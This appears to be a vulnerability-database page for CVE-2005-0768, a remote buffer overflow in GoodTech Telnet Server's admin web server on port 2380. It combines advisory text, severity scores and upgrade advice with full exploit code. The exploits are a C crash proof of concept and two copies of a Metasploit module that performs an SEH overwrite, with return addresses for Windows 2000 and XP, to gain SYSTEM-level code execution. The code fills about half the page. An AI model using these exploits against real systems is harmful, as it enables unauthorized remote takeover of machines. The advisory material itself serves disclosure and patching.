CVE-2005-0768
CVSS 10.0
Published: 2005-05-02 00:00:00
Last revised: 2016-10-17 23:14:12

[Original] Buffer overflow in the administration web server for GoodTech Telnet Server 4.0 and 5.0, and possibly all versions before 5.0.7, allows remote attackers to execute arbitrary code via a long string to port 2380.


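[CNNVD] GoodTech Telnet Server buffer overflow vulnerability (CNNVD-200505-203)

        A vulnerability exists in the administration web server of GoodTech Telnet Server (which runs on port 2380 by default). A remote attacker can trigger a buffer overflow by sending malformed, overly long data to the server. Sending the server an overly long string (10040 bytes) terminated by two newline characters can overflow the buffer and overwrite the instruction pointer, allowing the attacker to remotely execute arbitrary code with LOCAL_SYSTEM privileges.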
        

- CVSS (base score)

CVSS score: 10 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:goodtech_systems:goodtech_telnet_server:4.0::windows_nt
cpe:/a:goodtech_systems:goodtech_telnet_server:5.0::windows_nt

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0768
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0768
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-203
(Official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=111092012415193&w=2
(UNKNOWN)  BUGTRAQ  20050315 GoodTech Telnet Server Buffer Overflow Vulnerability
http://unsecure.altervista.org/security/goodtechtelnet.htm
(UNKNOWN)  MISC  http://unsecure.altervista.org/security/goodtechtelnet.htm

- Vulnerability information

GoodTech Telnet Server buffer overflow vulnerability
Critical  Buffer overflow
2005-05-02 00:00:00 2005-10-20 00:00:00
Remote

- Advisories and patches

        The vendor has released an upgrade patch that fixes this security issue. The patch is available at:
        http://www.goodtechsys.com/

- Vulnerability information (882)

GoodTech Telnet Server < 5.0.7 Buffer Overflow Crash Exploit (EDBID:882)
windows dos
2005-03-15 Verified
0 Komrade
N/A
/******************************************************************************************

	GoodTech Telnet Server Buffer Overflow Crash POC
	created by Komrade
	e-mail:	unsecure(at)altervista(dot)org
	web:	http://unsecure.altervista.org

	Tested on GoodTech Telnet Server versions 4.0 - 5.0 (versions prior to 5.0.7)
        on a Windows XP Professional sp2 operating system.

	This exploit connects to the Administration server of GoodTech Telnet Server
	(default port 2380) and sends a very long string (10040 bytes).
	After the exploit is sent the Telnet Server will crash, trying to access
	a bad memory address: 0xDEADC0DE.

	Usage: gtscrash.exe "IP address"

	Options:
	"IP address"	The IP address of the computer running GoodTech Telnet Server

*******************************************************************************************/

#include <windows.h>
#include <winsock.h>
#include <stdio.h>

int main(int argc, char **argv)
{

	SOCKET sock;
	struct sockaddr_in sock_addr;
	WSADATA data;
	WORD p;
	p=MAKEWORD(2,0);
	WSAStartup(p,&data);
	int i, n, err;
	unsigned char *mex;
	char risp[4096];

	printf("------------------------------------------------------------------------------\r\n");
	printf("\tGoodTech Telnet Server Buffer Overflow Crash POC\r\n");
	printf("\t\t\tcreated by Komrade\r\n\r\n");

	printf("\t\te-mail: unsecure(at)altervista(dot)org\r\n");
	printf("\t\tweb: http://unsecure.altervista.org\r\n");
	printf("------------------------------------------------------------------------------\r\n\r\n");


	if (argc < 2){
		printf("Usage: gtscrash.exe \"IP address\"\r\n\r\n");
		printf("Options:\r\n");
		printf("IP address\tThe IP address of the computer running GoodTech Telnet Server\r\n");
		exit(0);
	}

	mex =(unsigned char *) LocalAlloc(LMEM_FIXED, 12000);

	sock = socket(AF_INET, SOCK_STREAM, 0);
	sock_addr.sin_family=PF_INET;
	sock_addr.sin_port=htons(2380); /* Administration web server port */
	sock_addr.sin_addr.s_addr= inet_addr(argv[1]);

	err = connect(sock,(struct sockaddr*)&sock_addr,sizeof(struct sockaddr));
	if(err<0){
		printf("Unable to connect() to %s\n", argv[1]);
		exit(-1);
	}

	strcpy (mex, "GET /");

	for(i = strlen(mex); i < 10032; i++)
		mex[i]= 'a';
	mex[i]=0;

	strcat(mex, "\xDE\xC0\xAD\xDE"); /* Invalid IP address */
	strcat(mex, "\r\n\r\n");

	printf("Sending %d bytes.....\n\n", strlen(mex));
	n=send(sock, mex , strlen(mex), 0);

	n=recv(sock, risp, sizeof(risp), 0);
	if (n < 0)
		printf("GoodTech Telnet Server successfully crashed!!\n");
	else{
		risp[n]=0;
		printf("%s\n", risp);
	}

	closesocket(sock);
	WSACleanup();
	return 0;
}

// milw0rm.com [2005-03-15]
		

- Vulnerability information (16817)

GoodTech Telnet Server <= 5.0.6 Buffer Overflow (EDBID:16817)
windows remote
2010-05-09 Verified
2380 metasploit
N/A
##
# $Id: goodtech_telnet.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'GoodTech Telnet Server <= 5.0.6 Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in GoodTech Systems Telnet Server
				versions prior to 5.0.7. By sending an overly long string, an attacker can
				overwrite the buffer and control program execution.
			},
			'License'        => MSF_LICENSE,
			'Author'         => 'MC',
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					[ 'CVE', '2005-0768' ],
					[ 'OSVDB', '14806'],
					[ 'BID', '12815' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
				},
			'Platform' => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 Pro English All',   { 'Ret' => 0x75022ac4 } ],
					[ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ],
				],
			'Privileged'     => true,
			'DisclosureDate' => 'Mar 15 2005',
			'DefaultTarget'  => 0))

		register_options(
			[
				Opt::RPORT(2380)
			], self.class)
	end

	def exploit
		connect

		sploit = rand_text_english(10020, payload_badchars)
		seh    = generate_seh_payload(target.ret)

		sploit[10012, seh.length] = seh

		print_status("Trying target #{target.name}...")

		sock.put(sploit + "\r\n\r\n")

		handler
		disconnect
	end

end
		

- Vulnerability information (F83203)

GoodTech Telnet Server <= 5.0.6 Buffer Overflow (PacketStormID:F83203)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow
CVE-2005-0768

This Metasploit module exploits a stack overflow in GoodTech Systems Telnet Server versions prior to 5.0.7. By sending an overly long string, an attacker can overwrite the buffer and control program execution.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Seh
        
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'GoodTech Telnet Server <= 5.0.6 Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in GoodTech Systems Telnet Server 
				versions prior to 5.0.7. By sending an overly long string, an attacker can 
				overwrite the buffer and control program execution.
			},
			'License'        => MSF_LICENSE,
			'Author'         => 'MC',
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2005-0768' ],
					[ 'OSVDB', '14806'],
					[ 'BID', '12815' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},					
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
				},
			'Platform' => 'win',
			'Targets'        => 
				[
					[ 'Windows 2000 Pro English All',   { 'Ret' => 0x75022ac4 } ],
					[ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ],
				],
			'Privileged'     => true,
			'DisclosureDate' => 'Mar 15 2005',
			'DefaultTarget'  => 0))

		register_options([ Opt::RPORT(2380) ], self)
	end

	def exploit
		connect

		sploit = rand_text_english(10020, payload_badchars)
		seh    = generate_seh_payload(target.ret)

		sploit[10012, seh.length] = seh

		print_status("Trying target #{target.name}...")

		sock.put(sploit + "\r\n\r\n")

		handler
		disconnect
	end

end
    

- Vulnerability information

14806
GoodTech Telnet Server Admin Web Server Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified, Coordinated Disclosure

- Vulnerability description

A buffer overflow exists in GoodTech Telnet Server. The web server fails to validate data received on TCP port 2380 resulting in a stack overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- Timeline

2005-03-15 2005-03-11
2005-03-16 2005-03-15

- Solution

Upgrade to version 5.0.7 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author

- Vulnerability information

GoodTech Systems Telnet Server for Windows NT/2000/XP/2003 Remote Buffer Overflow Vulnerability
Boundary Condition Error 12815
Yes No
2005-03-15 12:00:00 2009-07-12 10:56:00
Komrade <unsecure@altervista.org> is credited with the discovery of this issue.

- Affected software versions

GoodTech Telnet Server for Windows NT/2000/XP/2003 5.0
GoodTech Telnet Server for Windows NT/2000/XP/2003 4.0

- Vulnerability discussion

A remote buffer overflow vulnerability affects GoodTech Systems Telnet Server for Windows NT/2000/XP/2003. This issue is due to a failure of the application to securely copy network-derived data into sensitive process buffers.

An attacker may leverage this issue to execute arbitrary code with SYSTEM privileges on a computer running a vulnerable version of the affected software.

- Exploit

The 'goodTechTelnetBufferOverflowPoC.c' proof of concept has been made available. The exploit 'goodTechTelnetBufferOverflowExploit.c' has been made available as well.

- Solution

Reportedly the vendor has released an upgrade dealing with this issue, although this is not confirmed. Please contact the vendor for more information.

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Related references
